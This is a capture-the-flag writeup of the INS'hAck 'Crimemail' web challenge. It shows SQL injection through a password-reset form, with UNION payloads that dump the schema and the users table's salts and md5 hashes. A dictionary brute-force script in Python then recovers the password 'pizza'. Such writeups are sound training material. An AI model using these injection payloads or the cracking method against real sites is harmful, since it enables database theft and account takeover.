Tuesday, April 10, 2018

INS'hAck - Crimemail Writeup

“service, to communicate with his associates. Let’s see if you can hack your way in his account… Hint: his password’s md5 is computed as follows: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an English dictionary”


There was a simple login form on the web page, so, obviously, the usual login-form routine tests were run against it.

After a couple of tries I followed the “Lost password?” link, and there was another form that looked a lot like the regular one we get behind this kind of link. Running some tests on it, I got an error message printed on the screen:

The most logical next step in a SQLi attack is to work out the number of columns in the query using the UNION operator.

Knowing that there was only one column, I tried to dump the schema (table and column names) from information_schema: ' union select concat(table_name,":",column_name) from information_schema.columns#

After taking a look at the end of the dumped info I found what I needed.

Having the full column names of the table, it was easy to dump its contents. With the following payload I could dump the contents of every column of the users table: ' union select concat(userID,":",username,":",pass_salt,":",pass_md5) from users#

OK, we had the dump, but the passwords were hashed and salted.

At this point I wrote my own brute force script:

Some seconds later the password was found:

pizza is the user password we needed :).
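The brute-force step above, as an added example written for this writeup rather than the author's own script: it parses rows in the userID:username:pass_salt:pass_md5 format the dump produced, applies the scheme from the hint (md5 of password + salt) to each word of a small stand-in wordlist, and reports any row that matches. The dump rows, the salts and the wordlist are all constructed here; the point it illustrates is that a per-user salt only defeats precomputed tables, and because md5 is fast and the password is a dictionary word, a straight loop over the dictionary still recovers it almost instantly.

```python
import hashlib

# Constructed sample rows in the format the dump produced:
#   userID:username:pass_salt:pass_md5
# The salts are made up; each hash is computed here with the challenge's
# own scheme (md5 of password + salt) so the example is self-checking.
SAMPLE_SALT = "x7Qp"  # constructed salt for the c.hackle row
SAMPLE_ROWS = [
    # admin's password is deliberately NOT in the wordlist below
    "1:admin:z9Lk:" + hashlib.md5(("correcthorsebattery" + "z9Lk").encode()).hexdigest(),
    "2:c.hackle:" + SAMPLE_SALT + ":" + hashlib.md5(("pizza" + SAMPLE_SALT).encode()).hexdigest(),
]

# Tiny stand-in for the English dictionary mentioned in the hint.
WORDLIST = ["apple", "banana", "password", "pizza", "secret"]


def parse_dump_line(line):
    """Split one 'userID:username:pass_salt:pass_md5' row into a dict."""
    user_id, username, salt, digest = line.strip().split(":", 3)
    return {"userID": user_id, "username": username,
            "pass_salt": salt, "pass_md5": digest.lower()}


def salted_md5(password, salt):
    """The scheme stated in the hint: md5 over password concatenated with salt."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def recover_password(row, wordlist):
    """Return the wordlist entry whose salted md5 matches the row, or None."""
    for word in wordlist:
        if salted_md5(word, row["pass_salt"]) == row["pass_md5"]:
            return word
    return None


def crack_dump(rows, wordlist):
    """Map username -> recovered password for every row that matches a word."""
    found = {}
    for line in rows:
        row = parse_dump_line(line)
        password = recover_password(row, wordlist)
        if password is not None:
            found[row["username"]] = password
    return found


if __name__ == "__main__":
    print(crack_dump(SAMPLE_ROWS, WORDLIST))  # {'c.hackle': 'pizza'}
```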

Then I logged in with the c.hackle:pizza credentials:

Capture the Flag , Web , Writeup